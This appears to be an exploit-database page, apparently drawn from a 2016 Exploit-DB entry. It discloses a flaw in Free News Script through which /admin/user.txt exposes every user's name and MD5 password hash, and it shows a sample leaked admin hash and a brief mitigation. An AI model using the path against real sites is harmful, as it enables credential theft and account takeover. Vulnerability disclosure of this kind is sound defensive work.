header-logo
Suggest Exploit
vendor:
Free News Script
by:
Meisam Monsef
7,5
CVSS
HIGH
Password Disclosure
200
CWE
Product Name: Free News Script
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Free News Script User Password Download File

A vulnerability in Free News Script allows an attacker to download a file containing the username and password hash of all users. By accessing the URL http://site/admin/user.txt, an attacker can download a file containing the username and password hash of all users. The password hash is in MD5 format.

Mitigation:

Ensure that the user.txt file is not accessible from the web server.
Source

Exploit-DB raw data:

# Exploit Title: Free News Script User Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns
# Version: All Version
# Download Link : http://www.newsp.eu/newsp.zip

Exploit :
http://site/admin/user.txt
Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1|

Username = Admin
Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5]

Navigation

Suggest Exploit

Services By CQR